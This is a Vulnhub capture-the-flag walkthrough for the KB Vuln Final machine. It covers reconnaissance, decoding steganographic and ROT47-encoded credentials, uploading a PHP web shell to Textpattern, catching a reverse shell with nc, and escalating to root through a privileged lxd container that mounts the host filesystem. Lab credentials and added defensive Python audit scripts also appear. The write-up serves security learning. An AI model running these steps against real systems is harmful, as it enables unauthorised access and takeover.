Vulnhub KB Vuln Final: Detailed Walkthrough

Published 2023-04-12 11:37:42, author: Jason_huawen

KB Vuln Final

Author: jason huawen

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                        
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:ab:da:3f      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.184  08:00:27:0e:f6:a9      1      60  PCS Systemtechnik GmbH         

Using Kali Linux's netdiscover tool, the target host's IP address is identified as 192.168.56.184.

NMAP scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.184 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-11 22:15 EDT
Nmap scan report for localhost (192.168.56.184)
Host is up (0.00013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 cd:15:fb:cc:47:de:a3:16:e9:b8:6b:61:7a:25:5a:b7 (RSA)
|   256 82:a5:1b:08:06:12:c0:36:38:e7:53:18:47:ea:3f:f8 (ECDSA)
|_  256 f4:d9:65:bd:7d:68:03:31:c3:64:06:48:1d:fb:e7:47 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hacked!
| http-git: 
|   192.168.56.184:80/.git/
|     Git repository found!
|     .gitignore matched patterns 'bug'
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Last commit message: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN...
|     Remotes:
|       https://github.com/textpattern/textpattern.git
|_    Project type: node.js application (guessed from .gitignore)
MAC Address: 08:00:27:0E:F6:A9 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.37 seconds

The NMAP scan shows that the target host has 2 open ports, 22 (ssh) and 80 (http), and the http-git script output shows that the site exposes a .git/ directory.
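An exposed .git/ directory like the one nmap reported is something a defender can spot in the web server's own access log, because every clone or scan of it requests /.git/HEAD and /.git/config. The following is an added example, not part of the original post and not from the target machine: it parses Apache combined-format log lines (constructed samples, including a request from a scanner user agent and one blocked with 403) and reports which sensitive paths were actually served (2xx) and to which source address.

```python
import re
from collections import Counter

# Apache "combined" log format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Paths that should never be reachable under a web root. /.git/ is what the
# nmap http-git script found on this host; .env and config.php are common
# companions. This list is an auditor's choice (assumption), not a standard.
SENSITIVE_PATH_RE = re.compile(r'(^|/)\.git(/|$)|(^|/)\.env$|(^|/)config\.php$', re.I)

# Constructed sample log lines (not captured from the target).
SAMPLE_LOG = """\
192.168.56.230 - - [11/Apr/2023:22:15:01 -0400] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
192.168.56.230 - - [11/Apr/2023:22:15:01 -0400] "GET /.git/config HTTP/1.1" 200 310 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
192.168.56.1 - - [11/Apr/2023:22:16:40 -0400] "GET /index.php HTTP/1.1" 200 10333 "-" "Mozilla/5.0"
192.168.56.230 - - [11/Apr/2023:22:20:55 -0400] "GET /textpattern/config.php HTTP/1.1" 200 0 "-" "gobuster/3.5"
192.168.56.1 - - [11/Apr/2023:22:21:03 -0400] "GET /images/logo.png HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
192.168.56.50 - - [11/Apr/2023:23:02:11 -0400] "GET /.git/HEAD HTTP/1.1" 403 279 "-" "curl/7.88.1"
"""


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_sensitive_hits(log_text):
    """Return (ip, path, status) for each request to a sensitive path that the
    server answered with 2xx, i.e. the file was actually handed out. Blocked
    attempts (403/404) are not counted, so the result measures real exposure."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if SENSITIVE_PATH_RE.search(rec["path"]) and rec["status"].startswith("2"):
            hits.append((rec["ip"], rec["path"], int(rec["status"])))
    return hits


def hits_per_source(log_text):
    """Count served sensitive requests per client address."""
    return Counter(ip for ip, _, _ in find_sensitive_hits(log_text))


if __name__ == "__main__":
    for ip, path, status in find_sensitive_hits(SAMPLE_LOG):
        print(f"{ip} fetched {path} ({status})")
    print(dict(hits_per_source(SAMPLE_LOG)))
```

The 403 line is deliberately left out of the result: once the directory is denied in the web server configuration, the same scanner request becomes a blocked attempt rather than a leak, which is exactly the difference the filter on the status code captures.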

Getting a shell

                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ gobuster dir -u http://192.168.56.184 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.js,.txt --exclude-length 10333
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.184
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Exclude Length:          10333
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,html,sh,js,txt
[+] Timeout:                 10s
===============================================================
2023/04/11 22:20:55 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.184/images/]
/files                (Status: 301) [Size: 316] [--> http://192.168.56.184/files/]
/themes               (Status: 301) [Size: 317] [--> http://192.168.56.184/themes/]
/sites                (Status: 301) [Size: 316] [--> http://192.168.56.184/sites/]
/README.txt           (Status: 200) [Size: 1152]
/INSTALL.txt          (Status: 200) [Size: 3094]
/LICENSE.txt          (Status: 200) [Size: 15170]
/rpc                  (Status: 301) [Size: 314] [--> http://192.168.56.184/rpc/]
/HISTORY.txt          (Status: 200) [Size: 70459]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/UPGRADE.txt          (Status: 200) [Size: 3492]
/server-status        (Status: 403) [Size: 279]
Progress: 1034080 / 1323366 (78.14%)^C
[!] Keyboard interrupt detected, terminating.


Gobuster found the /sites directory.

Open port 80 in a browser, go to the /sites directory, and step down through the subdirectories one level at a time, reaching:

http://192.168.56.184/sites/site1/admin/

Visiting this directory shows that the target host runs the Textpattern content management system, so visit:

http://192.168.56.184/textpattern

This URL returns a user login page. The page source shows the hostname kb.final; add it to the /etc/hosts file:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ sudo vim /etc/hosts                                        
[sudo] password for kali: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ cat /etc/hosts                       
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.184  kb.final

In fact, the author already gives a hint on the home page: search me: machineboy141

Searching for this hacker with a search engine leads to:

https://github.com/machineboy141/KB-DUMP

Download the files to Kali Linux:

                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ steghide extract -sf yunus.jpg 
Enter passphrase: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ stegseek yunus.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: ""
[i] Original filename: "steganopayload1125574.txt".
[i] Extracting to "yunus.jpg.out".

                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ steghide extract -sf serpil.jpg 
Enter passphrase: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ stegseek serpil.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.72% (133.1 MB)           
[!] error: Could not find a valid passphrase.
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ steghide extract -sf omer.jpg  
Enter passphrase: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ stegseek omer.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: ""

[i] Original filename: "steganopayload202720.txt".
[i] Extracting to "omer.jpg.out".
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ steghide extract -sf mehmet.jpg 
Enter passphrase: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ stegseek mehmet.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.94% (133.4 MB)           
[!] error: Could not find a valid passphrase.
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ steghide extract -sf emre.jpg  
Enter passphrase: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ stegseek emre.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: ""
[i] Original filename: "steganopayload1125546.txt".
[i] Extracting to "emre.jpg.out".

                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ steghide extract -sf elif.jpg 
Enter passphrase: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ stegseek elif.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.89% (133.3 MB)           
[!] error: Could not find a valid passphrase.
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ steghide extract -sf deniz.jpg 
Enter passphrase: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ stegseek deniz.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.77% (133.1 MB)           
[!] error: Could not find a valid passphrase.
                                              

Three of the images yield hidden steganographic content:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ cat yunus.jpg.out 
http://kb.final/textpattern/                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ cat omer.jpg.out 
25>:?                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ cat emre.jpg.out 
6K3:C4:>6a_a_                                       

Use a website to identify the cipher:

https://www.dcode.fr/cipher-identifier

It is identified as ROT 47.

The site returns: ezbircime2020 admin
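ROT 47 is a fixed substitution over the 94 printable ASCII characters (codes 33 to 126): each character is rotated 47 positions within that range, and since 47 is half of 94 the transform is its own inverse, which is why the same routine both "encrypts" and decodes. It hides nothing from anyone who recognises it, so finding credentials stored this way is a finding in itself. The following added example (not from the original post) implements the transform and decodes the two strings recovered from the images above; the file names used as dictionary keys are simply those of the extracted files.

```python
def rot47(text):
    """Apply ROT47 to a string.

    Every character with code 33..126 is shifted by 47 inside that
    94-character range. Characters outside it (space, newline, non-ASCII)
    pass through unchanged. Applying the function twice returns the input.
    """
    out = []
    for ch in text:
        code = ord(ch)
        if 33 <= code <= 126:
            out.append(chr(33 + (code - 33 + 47) % 94))
        else:
            out.append(ch)
    return "".join(out)


# The two strings recovered from the images above (quoted from the post).
RECOVERED = {
    "omer.jpg.out": "25>:?",
    "emre.jpg.out": "6K3:C4:>6a_a_",
}


def decode_recovered(items=RECOVERED):
    """Decode each recovered string; returns {file name: plaintext}."""
    return {name: rot47(value) for name, value in items.items()}


def is_self_inverse(sample="The quick brown fox jumps over the lazy dog 0123456789 !@#$%^&*()"):
    """Check the involution property on a sample covering the whole range."""
    return rot47(rot47(sample)) == sample


if __name__ == "__main__":
    for name, plain in decode_recovered().items():
        print(f"{name}: {plain}")
    print("self-inverse:", is_self_inverse())
```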

Log in to http://kb.final/textpattern with this password.

The password should be ezbircime2021.

After logging in to the Textpattern admin back end, upload shell.php.

shell.php should end up in the /files/ directory:

http://kb.final/files/shell.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.184] 41448
Linux kb-server 4.15.0-134-generic #138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 03:07:18 up 59 min,  0 users,  load average: 0.00, 0.02, 0.98
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python

This gives a reverse shell from the target host.

www-data@kb-server:/var/www/html/textpattern/textpattern$ cat config.php
cat config.php
<?php
$txpcfg['db'] = 'textpattern';
$txpcfg['user'] = 'textuser';
$txpcfg['pass'] = 'ghostroot510';
$txpcfg['host'] = 'localhost';
$txpcfg['table_prefix'] = '';
$txpcfg['txpath'] = '/var/www/html/textpattern/textpattern';
$txpcfg['dbcharset'] = 'utf8mb4';
// For more customization options, please consult config-dist.php file.

www-data@kb-server:/var/www/html/textpattern/textpattern$ cd /home
cd /home
www-data@kb-server:/home$ ls 
ls 
machineboy
www-data@kb-server:/home$ su - machineboy
su - machineboy
Password: ghostroot510

The database connection password turns out to be machineboy's password as well, so the switch succeeds.

Privilege escalation

machineboy@kb-server:~$ id
id
uid=1000(machineboy) gid=1000(machineboy) groups=1000(machineboy),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

lxd can be used for privilege escalation.
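Membership of the lxd group is the whole problem here: lxd lets a member create a privileged container with the host's root filesystem mounted, so the group is effectively root, just like docker or sudo. An administrator can catch this before an attacker does by auditing group membership. The following added example (not part of the original post) parses the id(1) line shown above and a constructed /etc/group excerpt, and reports members of root-equivalent groups. The set of groups treated as root-equivalent is an auditing assumption, not a system constant.

```python
import re

# Groups whose members can reach root without further credentials:
# lxd and docker via privileged containers, sudo and wheel by policy.
# Assumption: which groups count as root-equivalent is the auditor's choice.
ROOT_EQUIVALENT_GROUPS = {"lxd", "docker", "sudo", "wheel"}

# The id(1) output quoted from the post above.
ID_LINE = ("uid=1000(machineboy) gid=1000(machineboy) "
           "groups=1000(machineboy),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)")

# Constructed /etc/group excerpt consistent with that id output (not copied from the host).
SAMPLE_GROUP_FILE = """\
root:x:0:
adm:x:4:syslog,machineboy
cdrom:x:24:machineboy
sudo:x:27:machineboy
www-data:x:33:
lxd:x:108:machineboy
machineboy:x:1000:
"""


def parse_id_output(line):
    """Parse 'uid=N(name) gid=N(name) groups=N(name),...' into a dict."""
    m = re.search(r"uid=(\d+)\(([^)]+)\)", line)
    if not m:
        raise ValueError("not an id(1) output line")
    groups_part = line.split("groups=", 1)[1] if "groups=" in line else ""
    groups = {name for _, name in re.findall(r"(\d+)\(([^)]+)\)", groups_part)}
    return {"uid": int(m.group(1)), "user": m.group(2), "groups": groups}


def risky_groups_for_id(line, risky=ROOT_EQUIVALENT_GROUPS):
    """Root-equivalent groups the user in an id(1) line belongs to, sorted."""
    return sorted(parse_id_output(line)["groups"] & risky)


def parse_group_file(text):
    """Map group name -> set of supplementary members from /etc/group text.
    Only the fourth field is read; users whose primary GID is the group
    are not listed there, which is the usual caveat with this file."""
    members = {}
    for raw in text.splitlines():
        if not raw or raw.startswith("#"):
            continue
        fields = raw.split(":")
        if len(fields) < 4:
            continue
        name, _, _, userlist = fields[:4]
        members[name] = {u for u in userlist.split(",") if u}
    return members


def audit_group_file(text, risky=ROOT_EQUIVALENT_GROUPS):
    """Return {group: [members]} for every root-equivalent group that has members."""
    found = parse_group_file(text)
    return {g: sorted(found[g]) for g in sorted(risky) if found.get(g)}


if __name__ == "__main__":
    print("from id output:", risky_groups_for_id(ID_LINE))
    for group, users in audit_group_file(SAMPLE_GROUP_FILE).items():
        print(f"group {group}: {', '.join(users)}")
```

Run against a real host, parse_group_file would take the contents of /etc/group; an empty result for lxd and docker is what a hardened machine should return, since an account that needs container management can usually be given a narrower mechanism than blanket group membership.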

┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ git clone  https://github.com/saghul/lxd-alpine-builder.git

Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 50 (delta 2), reused 5 (delta 2), pack-reused 42
Receiving objects: 100% (50/50), 3.11 MiB | 2.07 MiB/s, done.
Resolving deltas: 100% (15/15), done.
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ ls     
GitHack  GitHack.py  KB-DUMP  lxd-alpine-builder  nmap_full_scan
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ cd lxd-alpine-builder       

machineboy@kb-server:/tmp$ wget http://192.168.56.230:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2023-04-12 03:24:57--  http://192.168.56.230:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.230:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’

alpine-v3.13-x86_64-20210218_0139.tar.g 100%[============================================================================>]   3.11M  --.-KB/s    in 0.02s   

2023-04-12 03:24:57 (190 MB/s) - ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’ saved [3259593/3259593]

machineboy@kb-server:/tmp$ lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first container, try: lxc launch ubuntu:18.04

Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
machineboy@kb-server:/tmp$ lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | cd73881adaac | no     | alpine v3.13 (20210218_01:39) | x86_64 | 3.11MB | Apr 12, 2023 at 3:25am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
machineboy@kb-server:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
Error: No storage pool found. Please create a new storage pool
machineboy@kb-server:/tmp$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 
Name of the new storage pool [default=default]: 
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]: 
Create a new BTRFS pool? (yes/no) [default=yes]: 
Would you like to use an existing block device? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=15GB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: 
What should the new bridge be called? [default=lxdbr0]: 
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
Would you like LXD to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 
machineboy@kb-server:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
machineboy@kb-server:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
machineboy@kb-server:/tmp$ lxc start ignite
machineboy@kb-server:/tmp$ lxc exec ignite /bin/sh
~ # cd /mnt/root
/mnt/root # ls
bin             etc             lib             lost+found      proc            snap            tmp             vmlinuz.old
boot            home            lib32           media           root            srv             usr
cdrom           initrd.img      lib64           mnt             run             swap.img        var
dev             initrd.img.old  libx32          opt             sbin            sys             vmlinuz
/mnt/root # cd root
/mnt/root/root # ls -alh
total 32K    
drwx------    4 root     root        4.0K Jan 24  2021 .
drwxr-xr-x   26 root     root        4.0K Jan 24  2021 ..
-rw-------    1 root     root           0 Jan 24  2021 .bash_history
-rw-r--r--    1 root     root        3.0K Apr  9  2018 .bashrc
drwxr-xr-x    3 root     root        4.0K Jan 24  2021 .local
-rw-------    1 root     root         145 Jan 24  2021 .mysql_history
-rw-r--r--    1 root     root         148 Aug 17  2015 .profile
drwx------    2 root     root        4.0K Jan 24  2021 .ssh
-rw-------    1 root     root         240 Jan 24  2021 root.txt
/mnt/root/root # cat root.txt
 ________________
< congratulations >
 ----------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *
 
                          kernelblog.org
                          
cdf323526dbbd53d572d485fdd37d518
/mnt/root/root # 

With that, the root flag is obtained.